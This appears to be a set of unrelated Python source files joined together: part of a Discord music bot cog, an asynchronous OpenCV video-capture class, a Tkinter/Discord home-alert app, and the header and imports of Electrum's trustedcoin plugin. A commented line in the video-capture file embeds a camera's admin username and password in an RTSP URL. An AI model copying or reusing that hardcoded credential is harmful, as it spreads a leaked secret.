self.bot = bot
def stoppedPlaying(self, exception):
print("Stopped playback")
for vc in self.bot.voice_clients:
if not vc.is_playing():
self.bot.loop.create_task(vc.disconnect())
def PlayYtdl(self, args, ctx, ytdl_opts, vc):
with ctx.typing():
with ytdl.YoutubeDL(ytdl_opts) as ydl:
vid = ydl.extract_info(args)
if 'entries' in vid:
vid = vid['entries'][0]
print(vid)
audio = discord.FFmpegOpusAudio("./cache/{0}.opus".format(vid["id"]))
print("Playing {0}".format(vid["title"]))
vc.play(audio, after=self.stoppedPlaying)
response = discord.Embed(title="play")
response.add_field(name="Now playing", value=f"[{vid['title']}]({vid['webpage_url']})")
self.bot.loop.create_task(ctx.send(embed=response))
@commands.command(description="Plays an audio file")
@commands.guild_only()
@commands.check(is_in_voice_channel)
async def play(self, ctx, *, args):
        if ctx.guild.me.voice is None or ctx.guild.me.voice.channel != ctx.author.voice.channel:
await ctx.author.voice.channel.connect()
vc = ctx.guild.voice_client
if vc.is_playing():
response = discord.Embed(title="play")
response.add_field(name="Already Playing", value="The bot is already playing something")
await ctx.send(embed=response)
return
response = discord.Embed(title="play")
response.add_field(name="Searching...", value=args)
await ctx.send(embed=response)
ytdl_opts = {
'format': 'bestaudio/best',
'postprocessors': [{
'key': 'FFmpegExtractAudio',
'preferredcodec': 'opus',
'preferredquality': '128'
}],
'default_search': 'ytsearch',
'noplaylist': True,
# 'download_archive': './cache/files.txt',
'outtmpl': './cache/%(id)s.opus'
}
t = threading.Thread(target=self.PlayYtdl, args=(args,ctx,ytdl_opts,vc))
t.start()
def setup(bot):
print("Loading Music")
bot.add_cog(Music(bot))
def teardown(bot):
print("Unloading Music")
bot.remove_cog("Music")
|
videocaptureasync.py
|
# file: videocaptureasync.py
import threading
import cv2
from time import sleep
import copy
class VideoCaptureAsync:
def __init__(self, width=2688, height=1520):
#self.src = "/home/docout/Desktop/Exportación de ACC - 2019-07-09 23.05.46.avi"
#self.src = "rtsp://admin:DocoutBolivia@192.168.1.64:554/Streaming/Channels/102/"
# self.src = "/home/docout/Desktop/Exportación de ACC - 2019-07-09 23.05.46.avi"
#self.src = '/home/nubol23/Videos/Exportación de ACC - 2019-07-09 23.05.46.avi'
self.src = '/home/docout/Desktop/importante_battleship/Exportación de ACC - 2019-07-09 23.05.46.avi'
#self.src = "video.mp4"
self.cap = cv2.VideoCapture(self.src)
self.cap.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.cap.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
self.grabbed, self.frame = self.cap.read()
self.started = False
self.read_lock = threading.Lock()
def set(self, var1, var2):
self.cap.set(var1, var2)
def start(self):
if self.started:
            print('[!] Asynchronous video capturing has already been started.')
return None
self.started = True
self.thread = threading.Thread(target=self.update, args=())
self.thread.start()
return self
def update(self):
while self.started:
sleep(0.03)
grabbed, frame = self.cap.read()
with self.read_lock:
self.grabbed = grabbed
self.frame = frame
def read(self):
with self.read_lock:
frame = self.frame.copy()
grabbed = self.grabbed
return grabbed, frame
def isOpened(self):
return self.cap.isOpened()
def stop(self):
self.started = False
self.thread.join()
def __exit__(self, exec_type, exc_value, traceback):
self.cap.release()
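# Minimal usage sketch (not part of the original module; the loop and exit
# condition are illustrative):
#   cap = VideoCaptureAsync().start()
#   while cap.isOpened():
#       grabbed, frame = cap.read()
#       if not grabbed:
#           break
#       # ... process frame ...
#   cap.stop()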
|
HomeAlertDiscord.py
|
#!/usr/bin/python3
# GUI libraries
import tkinter as tk
import tkinter.ttk as ttk
from PIL import Image, ImageTk, ImageOps
# Discord bot and other libraries
import discord, dotenv
from discord.ext import commands
# System libraries
import os, threading
# Math libraries
from sympy import var, Eq, solve
x = var("x")
__version__ = 1.0
__author__ = "QuentiumYT"
__filename__ = "HomeAlertDiscord"
# ANCHOR Variables declaration
is_bot_enabled = True
is_windows = os.name == "nt"
if is_bot_enabled:
dotenv.load_dotenv(".env")
bot_token = os.environ.get("TOKEN")
user_list = os.environ.get("USER_LIST").split(".")
client = commands.Bot(command_prefix="!")
# Using a 480x320 monitor on the Raspberry Pi
# (use this resolution on windows and fullscreen in RPi)
w_width = 480
w_height = 320
# Equation for exponential slider
equation = 0.1 * x**3 - 0.5 * x**2 + x
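# Sanity check of the mapping (slider position x -> minutes):
#   x = 5  -> 0.1*125  - 0.5*25  + 5  = 5.0 minutes
#   x = 10 -> 0.1*1000 - 0.5*100 + 10 = 60.0 minutes (the slider's upper bound)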
# Final variables for notification
f_desc = f_duration = f_when = f_priority = None
def usepic(pic, size):
"""
    Returns a square PhotoImage of the picture at the given path, resized to size x size pixels.
>>> usepic("image.png", 80)
"""
close_pic = Image.open(pic)
close_pic2 = close_pic.resize((size, size), Image.ANTIALIAS)
return ImageTk.PhotoImage(close_pic2)
# ANCHOR Tooltip class
class Tooltip:
"""
    Creates a tooltip for a given widget, shown when the mouse hovers over it.
>>> button = Button(root)
>>> Tooltip(button, text="Tooltip info", bg="#FFFFFF", pad=(5,3,5,3), waittime=400, wraplength=250)
"""
def __init__(self, widget, *, text="Tooltip info", bg="#FFFFFF", pad=(5, 3, 5, 3), waittime=400, wraplength=250):
self.waittime = waittime
self.wraplength = wraplength
self.widget = widget
self.text = text
self.widget.bind("<Enter>", self.onEnter)
self.widget.bind("<Leave>", self.onLeave)
self.widget.bind("<ButtonPress>", self.onLeave)
self.bg = bg
self.pad = pad
self.id = None
self.tw = None
def onEnter(self, event=None):
self.schedule()
def onLeave(self, event=None):
self.unschedule()
self.hide()
def schedule(self):
self.unschedule()
self.id = self.widget.after(self.waittime, self.show)
def unschedule(self):
id_ = self.id
self.id = None
if id_:
self.widget.after_cancel(id_)
def show(self):
# Calculate position on widget enter
def tip_pos_calculator(widget, label, *, tip_delta=(10, 5), pad=(5, 3, 5, 3)):
w = widget
s_width, s_height = w.winfo_screenwidth(), w.winfo_screenheight()
width, height = (pad[0] + label.winfo_reqwidth() + pad[2], pad[1] + label.winfo_reqheight() + pad[3])
mouse_x, mouse_y = w.winfo_pointerxy()
x1, y1 = mouse_x + tip_delta[0], mouse_y + tip_delta[1]
x2, y2 = x1 + width, y1 + height
x_delta = x2 - s_width
if x_delta < 0:
x_delta = 0
y_delta = y2 - s_height
if y_delta < 0:
y_delta = 0
offscreen = (x_delta, y_delta) != (0, 0)
if offscreen:
if x_delta:
x1 = mouse_x - tip_delta[0] - width
if y_delta:
y1 = mouse_y - tip_delta[1] - height
offscreen_again = y1 < 0
if offscreen_again:
y1 = 0
return x1, y1
bg = self.bg
pad = self.pad
widget = self.widget
self.tw = tk.Toplevel(widget)
# Leaves only the label and removes the app window
self.tw.wm_overrideredirect(True)
win = ttk.Frame(self.tw, borderwidth=0)
label = ttk.Label(win, text=self.text, justify="left", background=bg, relief="solid", borderwidth=0, wraplength=self.wraplength)
label.grid(padx=(pad[0], pad[2]), pady=(pad[1], pad[3]), sticky="nsew")
win.grid()
x, y = tip_pos_calculator(widget, label)
self.tw.wm_geometry("+%d+%d" % (x, y))
def hide(self):
tw = self.tw
if tw:
tw.destroy()
self.tw = None
# ANCHOR Slider class
class Slider(tk.Frame):
def __init__(self, parent=None, from_=0, to_=100, change=None):
tk.Frame.__init__(self, parent)
self.change = change
self.result = 0
self.slider_width = 50
self.slider_height = 20
self.img_idle = Image.open("img/slider_idle.png")
self.img_slider_idle = ImageTk.PhotoImage(self.img_idle)
self.img_active = Image.open("img/slider_active.png")
self.img_slider_active = ImageTk.PhotoImage(self.img_active)
self.style = ttk.Style(self)
if not "custom.Horizontal.Scale.slider" in self.style.element_names():
self.style.element_create("custom.Horizontal.Scale.slider", "image", self.img_slider_idle, ("active", self.img_slider_active))
self.style.layout("custom.Horizontal.TScale", [("Horizontal.Scale.trough", {"sticky": "nswe", "children": [("custom.Horizontal.Scale.slider", {"side": "left"})]})])
self.style.configure("custom.Horizontal.TScale", background="lightgray")
self.slide = ttk.Scale(self, orient="horizontal", command=self.set_exp, length=200, from_=from_, to_=to_, style="custom.Horizontal.TScale")
self.slide.pack(side="right", expand=1, fill="x")
self.slide.configure(takefocus=0)
if not self.change:
self.text = tk.Label(self)
self.text.pack(side="top", fill="both")
def configure(self, variable):
self.slide.set(variable.get())
def update(self, variable):
self.variable = str(variable) + " minutes"
self.change.set(self.variable)
def set_log(self, val):
self.unimap = {"1": u"\u00b9", "2": u"\u00b2", "3": u"\u00b3",
"4": u"\u2074", "5": u"\u2075", "6": u"\u2076",
"7": u"\u2077", "8": u"\u2078", "9": u"\u2079"}
self.val = int(float(val))
self.result = 10**self.val
if self.change:
self.update(round(self.result, 2))
else:
self.text.configure(text="10%s" % (self.unimap[str(self.val)]))
def set_exp(self, val):
self.val = val
self.result = float(equation.subs(x, self.val))
if self.change:
self.update(round(self.result, 2))
else:
self.text.configure(text=str(round(self.result, 2)))
# ANCHOR Main class
class Main:
"""
Main selection window
>>> root = Tk()
>>> Main(root)
"""
def __init__(self, master):
self.master = master
self.font = "-family {Shentox 12} -size 12 -weight bold"
self.master.title("HomeAlertDiscord - Main")
self.master.grab_set()
self.master.focus()
self.master.update_idletasks()
self.master.protocol("WM_DELETE_WINDOW", self.close)
self.x = (self.master.winfo_screenwidth() - w_width) // 2
self.y = (self.master.winfo_screenheight() - w_height) // 2
if is_windows:
self.master.geometry("{}x{}+{}+{}".format(w_width, w_height, self.x, self.y))
self.master.iconbitmap("img/HomeAlertDiscord.ico")
else:
self.master.overrideredirect(True)
self.master.overrideredirect(False)
self.master.attributes("-fullscreen", True)
self.img = tk.PhotoImage(file="img/HomeAlertDiscord.png")
self.master.call("wm", "iconphoto", self.master._w, self.img)
self.master.bind("<F11>", lambda event: self.master.attributes("-fullscreen", not self.master.attributes("-fullscreen")))
self.master.bind("<Escape>", lambda event: self.close())
self.master.resizable(width=False, height=False)
self.pic_background = Image.open("img/clock_background.jpg")
self.pic_background = ImageOps.fit(self.pic_background, (self.x, self.y))
self.img = ImageTk.PhotoImage(self.pic_background)
self.background = tk.Label(self.master)
self.background.configure(image=self.img)
self.background.place(relx=0, rely=0, relheight=1, relwidth=1)
self.quit_btn = ttk.Button(self.master)
self.quit_btn.place(relx=0.0, rely=0.0, height=25, width=25)
self.quit_btn.configure(takefocus=0)
self.quit_btn.configure(cursor="tcross")
self.pic_close = usepic("img/deny.png", 15)
self.quit_btn.configure(image=self.pic_close)
self.quit_btn.configure(command=self.close)
Tooltip(self.quit_btn, text="Exit", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.info_btn = ttk.Button(self.master)
self.info_btn.place(relx=0.947, rely=0.0, height=25, width=25)
self.info_btn.configure(takefocus=0)
self.info_btn.configure(cursor="plus")
self.pic_info = usepic("img/info.png", 15)
self.info_btn.configure(image=self.pic_info)
self.info_btn.configure(command=self.open_info)
Tooltip(self.info_btn, text="About", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.text_window = ttk.Label(self.master)
self.text_window.place(relx=0.292, rely=0.019, height=22, width=200)
self.text_window.configure(font=self.font)
self.text_window.configure(background="black")
self.text_window.configure(foreground="white")
self.text_window.configure(anchor="center")
self.text_window.configure(text="Select any activity")
self.eat_starter = ttk.Button(self.master)
self.eat_starter.place(relx=0.125, rely=0.156, height=85, width=85)
self.pic_starter = usepic("img/starter.png", 75)
self.eat_starter.configure(image=self.pic_starter)
self.eat_starter.configure(cursor="circle")
self.eat_starter.configure(command=lambda: self.button_action("eat an appetizer"))
Tooltip(self.eat_starter, text="Eat an appetizer", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.eat_meal = ttk.Button(self.master)
self.eat_meal.place(relx=0.417, rely=0.156, height=85, width=85)
self.pic_meal = usepic("img/meal.png", 75)
self.eat_meal.configure(image=self.pic_meal)
self.eat_meal.configure(cursor="circle")
self.eat_meal.configure(command=lambda: self.button_action("eat the meal", True))
Tooltip(self.eat_meal, text="Eat the meal", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.eat_dessert = ttk.Button(self.master)
self.eat_dessert.place(relx=0.708, rely=0.156, height=85, width=85)
self.pic_dessert = usepic("img/dessert.png", 75)
self.eat_dessert.configure(image=self.pic_dessert)
self.eat_dessert.configure(cursor="circle")
self.eat_dessert.configure(command=lambda: self.button_action("eat dessert"))
Tooltip(self.eat_dessert, text="Eat dessert", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.horizontal_sep = ttk.Separator(self.master)
self.horizontal_sep.place(relx=0.123, rely=0.488, relwidth=0.75)
self.watch_movie = ttk.Button(self.master)
self.watch_movie.place(relx=0.125, rely=0.563, height=85, width=85)
self.pic_movie = usepic("img/movie.png", 75)
self.watch_movie.configure(image=self.pic_movie)
self.watch_movie.configure(cursor="circle")
self.watch_movie.configure(command=lambda: self.button_action("watch a movie"))
Tooltip(self.watch_movie, text="Watch a movie", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.go_outside = ttk.Button(self.master)
self.go_outside.place(relx=0.417, rely=0.563, height=85, width=85)
self.pic_go = usepic("img/outside.png", 75)
self.go_outside.configure(image=self.pic_go)
self.go_outside.configure(cursor="circle")
self.go_outside.configure(command=lambda: self.button_action("go outside"))
Tooltip(self.go_outside, text="Go outside", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.go_leave = ttk.Button(self.master)
self.go_leave.place(relx=0.708, rely=0.563, height=85, width=85)
self.pic_leave = usepic("img/leave.png", 75)
self.go_leave.configure(image=self.pic_leave)
self.go_leave.configure(cursor="circle")
self.go_leave.configure(command=lambda: self.button_action("leave the house", True))
Tooltip(self.go_leave, text="Leave the house", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
def close(self):
if is_bot_enabled:
client.loop.create_task(client.close())
self.master.destroy()
def button_action(self, button_desc, important=False):
global f_desc, f_priority
f_desc = button_desc
f_priority = important
self.open_duration()
def open_duration(self):
self.duration_w = tk.Toplevel()
Time(self.duration_w, title="HomeAlertDiscord - Duration", w_count=1)
def open_info(self):
self.info_w = tk.Toplevel()
Info(self.info_w, title="HomeAlertDiscord - Informations")
# ANCHOR Time class
class Time:
"""
Time selector window
>>> top = Toplevel()
>>> Time(top, title="Toplevel title", w_count=1)
"""
def __init__(self, top, title, w_count):
self.top = top
self.w_count = w_count
self.title = title
self.font = "-family {Shentox 12} -size 12 -weight bold"
self.top.title(self.title)
self.top.grab_set()
self.top.focus()
self.top.update_idletasks()
self.x = (self.top.winfo_screenwidth() - w_width) // 2
self.y = (self.top.winfo_screenheight() - w_height) // 2
if is_windows:
self.top.geometry("{}x{}+{}+{}".format(w_width, w_height, self.x, self.y))
self.top.iconbitmap("img/HomeAlertDiscord.ico")
else:
self.top.overrideredirect(True)
self.top.overrideredirect(False)
self.top.attributes("-fullscreen", True)
self.img = tk.PhotoImage(file="img/HomeAlertDiscord.png")
self.top.tk.call("wm", "iconphoto", self.top._w, self.img)
self.top.bind("<F11>", lambda event: self.top.attributes("-fullscreen", not self.top.attributes("-fullscreen")))
self.top.bind("<Escape>", lambda event: self.close())
self.top.resizable(width=False, height=False)
self.pic_background = Image.open("img/clock_background.jpg")
self.pic_background = ImageOps.fit(self.pic_background, (self.x, self.y))
self.img = ImageTk.PhotoImage(self.pic_background)
self.background = tk.Label(self.top)
self.background.configure(image=self.img)
self.background.place(relx=0, rely=0, relheight=1, relwidth=1)
self.quit_btn = ttk.Button(self.top)
self.quit_btn.place(relx=0.0, rely=0.0, height=25, width=25)
self.quit_btn.configure(takefocus=0)
self.quit_btn.configure(cursor="tcross")
self.pic_close = usepic("img/deny.png", 15)
self.quit_btn.configure(image=self.pic_close)
self.quit_btn.configure(command=self.close)
Tooltip(self.quit_btn, text="Exit", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.info_btn = ttk.Button(self.top)
self.info_btn.place(relx=0.947, rely=0.0, height=25, width=25)
self.info_btn.configure(takefocus=0)
self.info_btn.configure(cursor="question_arrow")
self.pic_info = usepic("img/info.png", 15)
self.info_btn.configure(image=self.pic_info)
self.info_btn.configure(command=self.open_info)
Tooltip(self.info_btn, text="About", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.text_window = ttk.Label(self.top)
self.text_window.place(relx=0.292, rely=0.019, height=22, width=200)
self.text_window.configure(font=self.font)
self.text_window.configure(background="black")
self.text_window.configure(foreground="white")
self.text_window.configure(anchor="center")
if self.w_count == 1:
self.text_window.configure(text="Select the duration")
else:
self.text_window.configure(text="Select the moment")
self.btn_0 = ttk.Button(self.top)
self.btn_0.place(relx=0.063, rely=0.12, height=60, width=60)
self.btn_0.configure(text="now")
self.btn_0.configure(cursor="circle")
self.btn_0.configure(command=lambda: self.button_time(self.btn_0.cget("text")))
Tooltip(self.btn_0, text="Now", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
if self.w_count == 1:
self.btn_0.configure(text="∞")
Tooltip(self.btn_0, text="Undefined", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.btn_1 = ttk.Button(self.top)
self.btn_1.place(relx=0.25, rely=0.12, height=60, width=60)
self.btn_1.configure(text="1min")
self.btn_1.configure(cursor="circle")
self.btn_1.configure(command=lambda: self.button_time(self.btn_1.cget("text")))
Tooltip(self.btn_1, text="1 minute", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.btn_3 = ttk.Button(self.top)
self.btn_3.place(relx=0.438, rely=0.12, height=60, width=60)
self.btn_3.configure(text="3min")
self.btn_3.configure(cursor="circle")
self.btn_3.configure(command=lambda: self.button_time(self.btn_3.cget("text")))
Tooltip(self.btn_3, text="3 minutes", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.btn_5 = ttk.Button(self.top)
self.btn_5.place(relx=0.625, rely=0.12, height=60, width=60)
self.btn_5.configure(text="5min")
self.btn_5.configure(cursor="circle")
self.btn_5.configure(command=lambda: self.button_time(self.btn_5.cget("text")))
Tooltip(self.btn_5, text="5 minutes", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.btn_15 = ttk.Button(self.top)
self.btn_15.place(relx=0.813, rely=0.12, height=60, width=60)
self.btn_15.configure(text="15min")
self.btn_15.configure(cursor="circle")
self.btn_15.configure(command=lambda: self.button_time(self.btn_15.cget("text")))
Tooltip(self.btn_15, text="15 minutes", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.btn_20 = ttk.Button(self.top)
self.btn_20.place(relx=0.063, rely=0.364, height=60, width=60)
self.btn_20.configure(text="20min")
self.btn_20.configure(cursor="circle")
self.btn_20.configure(command=lambda: self.button_time(self.btn_20.cget("text")))
Tooltip(self.btn_20, text="20 minutes", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.btn_30 = ttk.Button(self.top)
self.btn_30.place(relx=0.25, rely=0.364, height=60, width=60)
self.btn_30.configure(text="30min")
self.btn_30.configure(cursor="circle")
self.btn_30.configure(command=lambda: self.button_time(self.btn_30.cget("text")))
Tooltip(self.btn_30, text="30 minutes", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.btn_60 = ttk.Button(self.top)
self.btn_60.place(relx=0.438, rely=0.364, height=60, width=60)
self.btn_60.configure(text="1h")
self.btn_60.configure(cursor="circle")
self.btn_60.configure(command=lambda: self.button_time(self.btn_60.cget("text")))
Tooltip(self.btn_60, text="1 hour", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.btn_90 = ttk.Button(self.top)
self.btn_90.place(relx=0.625, rely=0.364, height=60, width=60)
self.btn_90.configure(text="1h30")
self.btn_90.configure(cursor="circle")
self.btn_90.configure(command=lambda: self.button_time(self.btn_90.cget("text")))
Tooltip(self.btn_90, text="1 hour and a half", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.btn_120 = ttk.Button(self.top)
self.btn_120.place(relx=0.813, rely=0.364, height=60, width=60)
self.btn_120.configure(text="2h")
self.btn_120.configure(cursor="circle")
self.btn_120.configure(command=lambda: self.button_time(self.btn_120.cget("text")))
Tooltip(self.btn_120, text="2 hours", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.horizontal_sep = ttk.Separator(self.top)
self.horizontal_sep.place(relx=0.063, rely=0.594, relwidth=0.875)
self.duration_txt = tk.StringVar()
self.duration_lenght = ttk.Entry(self.top)
self.duration_lenght.place(relx=0.229, rely=0.67, relheight=0.125, relwidth=0.333)
self.duration_lenght.configure(state="readonly")
self.duration_lenght.configure(takefocus=0)
self.duration_lenght.configure(textvariable=self.duration_txt)
self.duration_lenght.configure(cursor="star")
self.minus_btn = ttk.Button(self.top)
self.minus_btn.place(relx=0.104, rely=0.67, height=40, width=40)
self.minus_btn.configure(text="-")
self.minus_btn.configure(cursor="circle")
self.minus_btn.configure(command=lambda: self.slider_time(obj=self.duration_txt, action="remove"))
Tooltip(self.minus_btn, text="Decrease time by 1min", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.plus_btn = ttk.Button(self.top)
self.plus_btn.place(relx=0.604, rely=0.67, height=40, width=40)
self.plus_btn.configure(text="+")
self.plus_btn.configure(cursor="circle")
self.plus_btn.configure(command=lambda: self.slider_time(obj=self.duration_txt, action="add"))
Tooltip(self.plus_btn, text="Increase time by 1min", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.slider_val = tk.DoubleVar()
self.slider_val.set(5)
self.slider_duration = Slider(self.top, from_=0, to_=10, change=self.duration_txt)
self.slider_duration.place(relx=0.083, rely=0.88, relwidth=0.833, relheight=0.0, height=20, bordermode="ignore")
self.slider_duration.configure(variable=self.slider_val)
self.submit_btn = ttk.Button(top)
self.submit_btn.place(relx=0.771, rely=0.64, height=60, width=60)
self.submit_btn.configure(cursor="tcross")
self.pic_submit = usepic("img/accept.png", 50)
self.submit_btn.configure(image=self.pic_submit)
self.submit_btn.configure(command=lambda: self.button_time(self.duration_txt.get()))
Tooltip(self.submit_btn, text="Submit specific time", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.top.bind("<Return>", lambda x: self.button_time(self.duration_txt.get()))
self.top.bind("<minus>", lambda x: self.slider_time(obj=self.duration_txt, action="remove"))
self.top.bind("<plus>", lambda x: self.slider_time(obj=self.duration_txt, action="add"))
def close(self):
self.top.destroy()
def button_time(self, duration):
global f_duration, f_when
self.duration = duration
if "." in self.duration:
self.duration_raw = self.duration.replace(" minutes", "")
self.min = self.duration_raw.split(".")[0]
self.sec = self.duration_raw.split(".")[1]
self.duration = f"{self.min} minutes and {int(float(self.sec)*0.6)} seconds"
if self.w_count == 1:
f_duration = self.duration
self.open_when()
else:
f_when = self.duration
ProcessData()
self.close()
def slider_time(self, obj, action="add"):
self.action = action
self.current_time = obj.get()
self.exact_duration = float(self.current_time.split()[0])
if self.action == "add":
if self.exact_duration < 59:
self.new_time = self.exact_duration + 1
else:
self.new_time = 60
else:
if self.exact_duration > 0:
self.new_time = self.exact_duration - 1
else:
self.new_time = 0
self.duration_txt.set(str(self.new_time) + " minutes")
if self.new_time == 0.0:
self.new_time = 0
self.eq = Eq(equation, self.new_time)
self.result = solve(self.eq)[0]
self.slider_val.set(self.result)
self.slider_duration.configure(variable=self.slider_val)
def open_when(self):
self.w_when = tk.Toplevel()
Time(self.w_when, title="HomeAlertDiscord - When", w_count=2)
def open_info(self):
self.info_w = tk.Toplevel()
Info(self.info_w, title="HomeAlertDiscord - Informations")
# ANCHOR Info class
class Info:
"""
Information window
>>> top = Toplevel()
>>> Info(top, title="Toplevel title")
"""
def __init__(self, top, title):
self.top = top
self.title = title
self.font = "-family {Segoe UI} -size 14 -weight bold"
self.top.title(self.title)
self.top.grab_set()
self.top.focus()
self.top.update_idletasks()
self.x = (self.top.winfo_screenwidth() - w_width + 100) // 2
self.y = (self.top.winfo_screenheight() - w_height + 100) // 2
self.top.geometry("{}x{}+{}+{}".format(w_width - 100, w_height - 100, self.x, self.y))
if is_windows:
self.top.iconbitmap("img/HomeAlertDiscord.ico")
else:
self.img = tk.PhotoImage(file="img/HomeAlertDiscord.png")
self.top.tk.call("wm", "iconphoto", self.top._w, self.img)
self.top.bind("<F11>", lambda event: self.top.attributes("-fullscreen", not self.top.attributes("-fullscreen")))
self.top.bind("<Escape>", lambda event: self.close())
self.top.resizable(width=False, height=False)
self.quit_btn = ttk.Button(self.top)
self.quit_btn.place(relx=0.0, rely=0.0, height=25, width=25)
self.quit_btn.configure(takefocus=0)
self.quit_btn.configure(cursor="tcross")
self.pic_close = usepic("img/deny.png", 15)
self.quit_btn.configure(image=self.pic_close)
self.quit_btn.configure(command=self.close)
Tooltip(self.quit_btn, text="Exit", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.picture = ttk.Label(self.top)
self.picture.place(relx=0.053, rely=0.136, height=100, width=110)
self.pic_logo = usepic("img/HomeAlertDiscord.png", 98)
self.picture.configure(cursor="star")
self.picture.configure(image=self.pic_logo)
self.title = ttk.Label(self.top)
self.title.place(relx=0.395, rely=0.091, height=29, width=176)
self.title.configure(font=self.font)
self.title.configure(text="HomeAlertDiscord")
self.copyright = ttk.Label(self.top)
self.copyright.place(relx=0.395, rely=0.273, height=19, width=153)
self.copyright.configure(cursor="gobbler")
self.copyright.configure(text="Copyright © 2020 Quentin L")
self.TSeparator1 = ttk.Separator(self.top)
self.TSeparator1.place(relx=0.395, rely=0.409, relwidth=0.526)
self.support = ttk.Label(self.top)
self.support.place(relx=0.395, rely=0.455, height=19, width=123)
self.support.configure(text="Support and contact:")
self.website = ttk.Label(self.top)
self.website.place(relx=0.395, rely=0.591, height=19, width=133)
self.website.configure(foreground="blue")
self.website.configure(text="quentium.fr/en")
self.website.configure(cursor="hand2")
self.website.bind("<Button-1>", lambda x: self.open_link("https://quentium.fr/en/"))
self.github = ttk.Label(self.top)
self.github.place(relx=0.395, rely=0.682, height=19, width=183)
self.github.configure(foreground="blue")
self.github.configure(text="github.com/QuentiumYT")
self.github.configure(cursor="hand2")
self.github.bind("<Button-1>", lambda x: self.open_link("https://github.com/QuentiumYT/"))
self.TSeparator2 = ttk.Separator(self.top)
self.TSeparator2.place(relx=0.395, rely=0.818, relwidth=0.526)
self.paypal = ttk.Label(self.top)
self.paypal.place(relx=0.395, rely=0.864, height=19, width=93)
self.paypal.configure(foreground="blue")
self.paypal.configure(text="PayPal Donation")
self.paypal.configure(cursor="heart")
self.paypal.bind("<Button-1>", lambda x: self.open_link("https://paypal.me/QuentiumYT/"))
def close(self):
self.top.destroy()
def open_link(self, link):
if is_windows:
os.system("start " + link)
else:
os.system("xdg-open " + link)
# ANCHOR ProcessData class
class ProcessData:
def __init__(self):
if f_priority:
msg = f"Warning: Going to {f_desc} for {f_duration} in {f_when}."
else:
msg = f"Suggestion: Asking to {f_desc} in {f_when} for {f_duration}."
if is_bot_enabled:
async def exec_cmd(args):
for user_id in user_list:
await discord.utils.get(client.get_all_members(), id=int(user_id)).send(args)
try:
                # Run the async function on the bot's event loop from this
                # synchronous context, without having to await it here.
                # The only drawback is that the app freezes while Discord sends the message.
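                # A non-blocking alternative (not used here) would be to hand the
                # coroutine to the bot's already-running loop from this GUI thread,
                # e.g. asyncio.run_coroutine_threadsafe(exec_cmd(msg), client.loop)
                # (this would require importing asyncio in this module).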
client.loop.run_until_complete(exec_cmd(msg))
except:
pass
def start_gui():
root = tk.Tk()
main_window = Main(root)
root.mainloop()
def start_bot():
@client.event
async def on_ready():
print("Running")
@client.command(pass_context=True)
async def up(ctx):
return await ctx.send("The bot is up!")
client.run(bot_token)
# ANCHOR Startup
if __name__ == "__main__":
if is_bot_enabled:
th = threading.Thread(target=start_gui)
th.start()
start_bot()
else:
start_gui()
|
trustedcoin.py
|
#!/usr/bin/env python
#
# Electrum - Lightweight Bitcoin Client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import socket
import json
import base64
import time
import hashlib
from collections import defaultdict
from typing import Dict
from urllib.parse import urljoin
from urllib.parse import quote
from aiohttp import ClientResponse
from electrum import ecc, constants, keystore, version, bip32, bitcoin
from electrum.bitcoin import TYPE_ADDRESS, is_new_seed, seed_type, is_any_2fa_seed_type
from electrum.bip32 import (deserialize_xpub, deserialize_xprv, bip32_private_key, CKD_pub,
serialize_xpub, bip32_root, bip32_private_derivation, xpub_type)
from electrum.crypto import sha256
from electrum.transaction import TxOutput
from electrum.mnemonic import Mnemonic
from electrum.wallet import Multisig_Wallet, Deterministic_Wallet
from electrum.i18n import _
